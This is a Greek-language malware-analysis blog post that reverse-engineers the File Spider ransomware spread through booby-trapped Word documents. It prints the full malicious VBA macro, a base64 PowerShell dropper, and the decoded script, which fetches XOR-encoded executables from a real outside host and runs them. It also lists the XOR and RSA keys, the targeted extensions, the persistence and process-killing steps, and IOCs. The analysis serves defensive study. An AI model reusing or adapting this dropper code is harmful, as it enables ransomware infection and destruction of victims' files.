19/1/18

Κάνουμε Reverse Engineer τον File Spider Ransomware
O File Spider είναι ένας καινούργιος Ransomware, ο οποίος στοχεύει χρήστες Βαλκανικών χωρών.

Ο τρόπος διασποράς του είναι μέσω spam email με επισυναπτόμενο τύπου Microsoft Word (.doc) το οποίο είναι παγιδευμένο.

Το αρχείο που αναλύουμε έχει τίτλο 
BAYER_CORPSCIENCE_OFFICE_ZAGREB_29858.doc
MD5: de7b31517d5963aefe70860d83ce83b9


Το αρχείο έχει ενσωματωμένες μακροεντολές.

Κοιτώντας τον κώδικα των macro, έχουμε:
Private Function decodeBase64(ByVal strData As String) As Byte()
  Dim objXML As MSXML2.DOMDocument
  Dim objNode As MSXML2.IXMLDOMElement
  
  Set objXML = New MSXML2.DOMDocument
  Set objNode = objXML.createElement("b64")
  objNode.dataType = "bin.base64"
  objNode.Text = strData
  decodeBase64 = objNode.nodeTypedValue
  
  Set objNode = Nothing
  Set objXML = Nothing
End Function

Private Function str() As String

str = "cG93ZXJzaGVsbC5leGUgLXdpbmRvd3N0eWxlIGhpZGRlbiAkZGlyID0gW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnQXBwbGljYXRpb25EYXRhJykgKyAnXFNwaWRlcic7JGVuYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjg7ZnVuY3Rpb24geG9yIHtwYXJhbSgkc3RyaW5nLCAkbWV0aG9kK"
str = str + "SR4b3JrZXkgPSAkZW5jLkdldEJ5dGVzKCdBbGJlclRJJyk7JHN0cmluZyA9ICRlbmMuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHN0cmluZykpOyRieXRlU3RyaW5nID0gJGVuYy5HZXRCeXRlcygkc3RyaW5nKTskeG9yZERhdGEgPSAkKGZvciAoJGkgPSAwOyAkaSAtbH"
str = str + "QgJGJ5dGVTdHJpbmcubGVuZ3RoKXtmb3IoJGogPSAwOyAkaiAtbHQgJHhvcmtleS5sZW5ndGg7ICRqKyspeyRieXRlU3RyaW5nWyRpXSAtYnhvciAkeG9ya2V5WyRqXTskaSsrO2lmKCRpIC1nZSAkYnl0ZVN0cmluZy5MZW5ndGgpeyRqID0gJHhvcmtleS5sZW5ndGh9fX0pOyR4b3JkRGF0YSA9ICRlbmMuR2V"
str = str + "0 U3RyaW5nKCR4b3JkRGF0YSk7cmV0dXJuICR4b3JkRGF0YX07ZnVuY3Rpb24gZGF0YSB7cGFyYW0oJG1ldGhvZCkkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsgaWYgKCRtZXRob2QgLWVxICdkJyl7JGlucHV0ID0gJHdlYkNsaWVudC5Eb3dubG9hZFN0cmluZygnaHR0cDov"
str = str + "L3lvdXJqYXZhc2NyaXB0LmNvbS81MTE4NjMxNDc3L2phdmFzY3JpcHQtZGVjLTItMjUtMi5qcycpfWVsc2V7JGlucHV0ID0gJHdlYkNsaWVudC5Eb3dubG9hZFN0cmluZygnaHR0cDovL3lvdXJqYXZhc2NyaXB0LmNvbS81MzEwMzIwMTI3Ny9qYXZhc2NyaXB0LWVuYy0xLTAtOS5qcycpfSRieXRlcyA9IFtDb"
str = str + "252 ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyggKHhvciAkaW5wdXQgJ2QnKSApO3JldHVybiAgJGJ5dGVzfTtmdW5jdGlvbiBpbyB7cGFyYW0oJG1ldGhvZClpZigkbWV0aG9kIC1lcSAnZCcpeyRmaWxlbmFtZSA9ICRkaXIgKyAnXGRlYy5leGUnfWVsc2V7JGZpbGVuYW1lID0gJGRpciArICdcZW5jLmV4ZSd9W0"
str = str + "lPLkZpbGVdOjpXcml0ZUFsbEJ5dGVzKCRmaWxlbmFtZSwgKGRhdGEgJG1ldGhvZCkpfTtmdW5jdGlvbiBydW4ge3BhcmFtKCRtZXRob2QpaWYgKCRtZXRob2QgLWVxICdkJyl7aW8gJ2QnOyBIC1GaWxlUGF0aCAoJGRpciArICdcZGVjLmV4ZScpIC1Bcmd1bWVudExpc3QgJ3NwaWRlcid"
str = str + "9ZWxzZXtpbyAnZSc7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICgkZGlyICsgJ1xlbmMuZXhlJykgLUFyZ3VtZW50TGlzdCAnc3BpZGVyJywgJ2t0bicsICcxMDAnfX07aWYoIFRlc3QtUGF0aCAkZGlyKXt9ZWxzZXttZCAkZGlyOyBydW4gJ2QnOyBydW4gJ2UnIH0="

str = StrConv(decodeBase64(str), vbUnicode)

End Function


Κάνοντας αποκωδικοποίηση με base64 έχουμε:


powershell.exe -windowstyle hidden $dir = [Environment]::GetFolderPath('ApplicationData') + '\Spider';$enc = [System.Text.Encoding]::UTF8;
function xor{
param($string, $method)$xorkey = $enc.GetBytes('AlberTI');
$string = $enc.GetString([System.Convert]::FromBase64String($string));
$byteString = $enc.GetBytes($string);
$xordData = $(for ($i = 0; 
$i -lt $byteString.length){for($j = 0; $j -lt $xorkey.length; 
$j++){$byteString[$i] -bxor $xorkey[$j];
$i++;if($i -ge $byteString.Length){$j = $xorkey.length}}});
$xordData = $enc.GetString($xordData);return $xordData};
function data {
param($method)$webClient = New-Object System.Net.WebClient; 
if ($method -eq 'd'){
$input = $webClient.DownloadString('http://yourjavascript.com/5118631477/javascript-dec-2-25-2.js')}
else{
$input = $webClient.DownloadString('http://yourjavascript.com/53103201277/javascript-enc-1-0-9.js')}
$bytes = [Convert]::FromBase64String( (xor $input 'd') );
return $bytes};
function io {
param($method)
if($method -eq 'd'){
$filename = $dir + '\dec.exe'}
else{
$filename = $dir + '\enc.exe'}[IO.File]::WriteAllBytes($filename, (data $method))};
function run {
param($method)
if ($method -eq 'd'){io 'd'; 
Start-Process -FilePath ($dir + '\dec.exe') -ArgumentList 'spider'}
else{
io 'e'; Start-Process -FilePath ($dir + '\enc.exe') -ArgumentList 'spider', 'ktn', '100'}};
if( Test-Path $dir){}else{md $dir; run 'd'; run 'e' }
Αυτό το PowerShell script δημιουργεί ένα φάκελο στο %APPDATA%\Spider, κατεβάζει τον decryptor (dec.exe), κατεβάζει και εκτελεί τον encryptor (enc.exe).


O encryptor κατεβαίνει από το 
hχχp://yourjavascript.com/53103201277/javascript-enc-1-0-9.js

το οποίο είναι base64 encoded επίσης και κρυπτογραφημένο με XOR, ενώ το κλειδί κρυπτογράφησης για το XOR είναι "AlberTI".

Οπότε, στην πράξη ο encryptor κατεβαίνει, αποκρυπτογραφείται, αποθηκεύεται στο %APPDATA%\enc.exe και εκτελείται με 3 διακόπτες, τον "spider", τον "ktn" και τον "100".

Ομοίως, ο decryptor κατεβαίνει από το

hχχp://yourjavascript.com/5118631477/javascript-dec-2-25-2.js


που και πάλι είναι κωδικοποιημένο σε base64 και κρυπτογραφημένο με XOR, ενώ το κλειδί του XOR είναι το ίδιο.

Αποκρυπτογραφείται, αποθηκεύεται στο %APPDATA%\dec.exe και εκτελείται με το διακόπτη "spider"


Αναλύοντας τον encryptor (enc.exe)

MD5 : 67D5ABDA3BE629B820341D1BAAD668E3
FileName: enc.exe
FileType: MSIL

To binary εκτελείται με 3 διακόπτες, 
τον "spider", τον "ktn" και τον "100".

Πρώτα απ' όλα δημιουργεί ένα αναγνωριστικό ID του θύματος και το στέλνει στο %APPDATA%\Spider\id.txtΈνα string δημιουργείται από 0x20 bytes από τυχαίους χαρακτήρες, το δεύτερο διακόπτη (ktn) και τον τρίτο διακόπτη (100). Κρυπτογραφείται με RSA, ενώ το public key είναι hardcoded και είναι 

 <RSAKeyValue<Modulus>w7eSLIEBvAgxfDAH/P+ktHJa5Okev4klIRleEhAnR9/1gs5ZHySCUgidDJUVaFrplYLgMUDbsR9aUCBwf07CD8bJL6rUHqeIxpYoF2M7bGW5Vulz3w8C9WMxqnzsqfak9wbt9rT63HoZ5zPHy2ieBfkAEs3XsuaU/q2drl2mQhZodGF+nwiiwfq0gOK+XvPPp9Nq3bCPhVUBzAcp2tXcplT4GjDfSyR8M2VfRzWChipf+plUmcvUafki56ubNW9pApUpd7UOEY1UKqHneMYdVJNhNrsx3T+wJiQNKj2/NMWSfGrN9W+QAVBnqbPgxmSYhfYNy7Fra32yOZ7ho3H1sw==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>

Το δείγμα που εξετάζουμε επιτίθεται σε όλους τους δίσκους του συστήματος και κρυπτογραφεί τα αρχεία με αυτές τις καταλήξεις:


lnk url contact 1cd dbf dt cf cfu mxl epf kdbx erf vrp grs geo st conf pff mft efd 3dm 3ds rib ma sldasm sldprt max blend 
lwo lws m3d mb obj x x3d movie byu c4d fbx dgn dwg 4db 4dl 4mp abs accdb accdc accde accdr accdt accdw accft adn a3d adp 
aft ahd alf ask awdb azz bdb bib bnd bok btr bak backup cdb ckp clkw cma crd daconnections dacpac dad dadiagrams daf daschema
db db-shm db-wal db2 db3 dbc dbk dbs dbt dbv dbx dcb dct dcx ddl df1 dmo dnc dp1 dqy dsk dsn dta dtsx dxl eco ecx edb emd eql 
fcd fdb fic fid fil fm5 fmp fmp12 fmpsl fol fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdb 
mdbhtml mdf mdn mdt mrg mud mwb s3m myd ndf ns2 ns3 ns4 nsf nv2 nyf oce odb oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz 
pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp sql sqlite sqlite3 sqlitedb str tcx tdt te teacher tmd trm udb usr 
v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 ppt pptx 1st abw act aim ans apt asc ascii ase aty awp awt aww bad bbs bdp bdr 
bean bna boc btd bzabw chart chord cnm crwl cyi dca dgs diz dne doc docm docx docxml docz dot dotm dotx dsv dvi dx eio eit email 
emlx epp err etf etx euc fadein faq fb2 fbl fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt fountain gtp frt fwdn fxc gdoc gio gpn 
gsd gthr gv hbk hht hs htc hwp hz idx iil ipf jarvis jis joe jp1 jrtf kes klg knt kon kwd latex lbt lis lit lnt lp2 lrc lst ltr 
ltx lue luf lwp lxfml lyt lyx man map mbox md5txt me mell min mnt msg mwp nfo njx notes now nwctxt nzb ocr odm odo odt ofl oft 
openbsd ort ott p7s pages pfs pfx pjt plantuml prt psw pu pvj pvm pwi pwr qdl rad readme rft ris rng rpt rst rt rtd rtf rtx run 
rzk rzn saf safetext sam scc scm scriv scrivx sct scw sdm sdoc sdw sgm sig skcard sla slagz sls smf sms ssa strings stw sty sub 
sxg sxw tab tdf tex text thp tlb tm tmv tmx tpc trelby tvj txt u3d u3i unauth unx uof uot upd utf8 unity utxt vct vnt vw wbk wcf 
webdoc wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wpl wps wpt wpw wri wsc wsd wsh wtx xbdoc xbplate xdl xlf xps xwp xy3 xyp xyw ybk yml zabw
zw 2bp 036 3fr 0411 73i 8xi 9png abm afx agif agp aic albm apd apm apng aps apx art artwork arw asw avatar bay blkrt bm2 bmp bmx 
bmz brk brn brt bss bti c4 cal cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib dicom djv djvu 
dm3 dmi vue dpx wire drz dt2 dtw dvl ecw eip exr fal fax fpos fpx g3 gcdp gfb gfie ggr gif gih gim gmbck gmspr spr scad gpd gro grob
hdp hdr hpi i3d icn icon icpr iiq info int ipx itc2 iwi j j2c j2k jas jb2 jbig jbig2 jbmp jbr jfif jia jng jp2 jpe jpeg jpg jpg2 
jps jpx jtf jwl jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs myl ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 
af3 ai asy cdmm cdmt cdmtz cdmz cdt cgm cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded design dhs dpp drw dxb dxf egc emf ep eps 
epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gdraw gem glox hpg hpgl hpl idea igt igx imd vbox
vdi ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat otg ovp ovr pcs pfd pfv pl plt pm vrml pmg pobj ps psid rdl scv sk1 sk2 slddrt 
snagitstamps snagstyles ssk stn svf svg svgz sxd tlc tne ufr vbr vec vml vsd vsdm vsdx vstm stm vstx wmf wpg vsm vault xar xmind 
xmmap yal orf ota oti ozb ozj ozt pal pano pap pbm pc1 pc2 pc3 pcd pcx pdd pdn pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpeg 
pjpg png pni pnm pntg pop pp4 pp5 ppm prw psd psdx pse psp pspbrush ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric 
riff rix rle rli rpf rri rs rsb rsr rw2 rwl s2mv sai sci sep sfc sfera sfw skm sld sob spa spe sph spj spp sr2 srw ste sumo sva save 
ssfn t2b tb0 tbn tfc tg4 thm thumb tif tiff tjp tm2 tn tpi ufo uga usertile-ms vda vff vpe vst wb1 wbc wbd wbm wbmp wbz wdp webp wpb 
wpe wvl x3f y ysp zif cdr4 cdr6 cdrw pdf pbd pbl ddoc css pptm raw cpt tga xpm ani flc fb3 fli mng smil mobi swf html xls xlsx csv 
xlsm ods xhtm 7z m2 rb rar wmo mcmeta m4a itm vfs0 indd sb mpqge fos p7c wmv mcgame db0 p7b vdf DayZProfile p12 d3dbsp ztmp rofl 
sc2save sis hkx pem dbfv sie sid bar crt sum ncf upk cer wb2 ibank menu das der t13 layout t12 dmp litemod dxg qdf blob asset xf esm 
forge tax 001 r3d pst pkpass vtf bsa bc6 dazip apk bc7 fpk re4 bkp mlx sav raf qic kf lbf bkf iwd slm xlk sidn vpk bik mrwref xlsb 
sidd tor epk mddata psk rgss3a itl rim pak w3x big icxs fsh unity3d hvpl ntl wotreplay crw hplg arch00 xxx hkdb lvl desc mdbackup snx 
py srf odc syncdb cfr m3u gho ff odp cas vpp_pc js dng lrf c cpp cs h bat ps1 php asp java jar class aaf aep aepx plb prel prproj aet 
ppj indl indt indb inx idml pmd xqx fla as3 as docb xlt xlm xltx xltm xla xlam xll xlw pot pps potx potm ppam ppsx ppsm sldx sldm aif 
iff m4u mid mpa ra 3gp 3g2 asf asx vob m3u8 mkv dat efx vcf xml ses zip 7zip mp4 3gp webm wmv

Οι φάκελοι που εξαιρούνται είναι οι:


"tmp", "Videos", "winnt", "Application Data", "Spider", "PrefLogs", "Program Files (x86)", "Program Files", "ProgramData", "Temp", "Recycle", "System Volume Information", "Boot", "Windows"Κάθε αρχείο κρυπτογραφείται με AES CFB αλγόριθμο με το ίδιο κλειδί το οποίο είναι κρυπτογραφημένο με RSA και αλατισμένο με 0x20 τυχαία bytes.


Το password και το αλάτι δημιουργούνται τυχαία.

Αυτά τα δύο είναι διαφορετικά για κάθε αρχείο, οπότε είναι δεμένα με κάθε κρυπτογραφημένο αρχείο.

Τα πρώτα 0x20 bytes είναι το αλάτι, τα επόμενα 0x50 bytes είναι το password το οποίο είναι κρυπτογραφημένο με AES και το υπόλοιπο είναι το κρυπτογραφημένο αρχείο:
Μετά την κρυπτογράφηση κάθε αρχείου, το προσθέτει με το πλήρες path του στο %APPDATA%\Spider\files.txt
Σε κάθε φάκελο, δημιουργεί μία συντόμευση με το όνομα "HOW TO DECRYPT FILES.url" η οποία παραπέμπει στο hxxps://vid.me/embedded/CGyDc?autoplay=1&stats=1 (όπου κάποτε υπήρχε ένα βίντεο με οδηγίες πληρωμής σε Bitcoin και το οποίο πλέον δεν είναι διαθέσιμο).

Τοποθετεί την επέκταση .spider σε κάθε κρυπτογραφημένο αρχείο.
Αναλύοντας τον decryptor (dec.exe)


MD5: fdd465863a4c44aa678554332d20aee3
FileName: dec.exe
FileType: MSIL

To binary εκτελείται με μόνο διακόπτη τον "spider". 

Δημιουργεί ένα mutex με την ονομασία "SpiderForm" προκειμένου να αποφευχθεί η εκτέλεση προλλαπλών instances. 

Ο διακόπτης που στέλνεται  εκεί πρέπει να είναι spider ή startup, ειδάλλως δεν θα ξεκινήσει.
Στη συνέχεια τερματίζει τις ακόλουθες διεργασίες:

"taskmgr", "procexp", "msconfig", "Starter", "regedit", "cdclt", "cmd", "OUTLOOK", "WINWORD", "EXCEL", "MSACCESS"

Μετά, δημιουργεί μία εγγραφή στη Registry (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run) έτσι ώστε το dec.exe να τρέχει στο ξεκίνημα των Windows.

Όνομα : "Starter"

Τιμή : "%APPDATA%\Spider\dec.exe startup"

Τέλος, ξεκινάει την φόρμα που περιέχει τις οδηγίες πληρωμής και το εργαλείο αποκρυπτογράφησης.

Η ιστοσελίδα πληρωμής είναι spiderwjzbmsmu7y[.]onionIOCs :

MS word document : de7b31517d5963aefe70860d83ce83b9
Encrypted enc.exe : hxxp://yourjavascript.com/53103201277/javascript-enc-1-0-9.js
Encrypted dec.exe : hxxp://yourjavascript.com/5118631477/javascript-dec-2-25-2.js
enc.exe : 67D5ABDA3BE629B820341D1BAAD668E3
dec.exe : fdd465863a4c44aa678554332d20aee3
Payment site : spiderwjzbmsmu7y[.]onion

Video : hxxps://vid.me/embedded/CGyDc?autoplay=1&stats=1

Ευχαριστούμε τon SDK για την παροχή πληροφοριών και συμβουλών.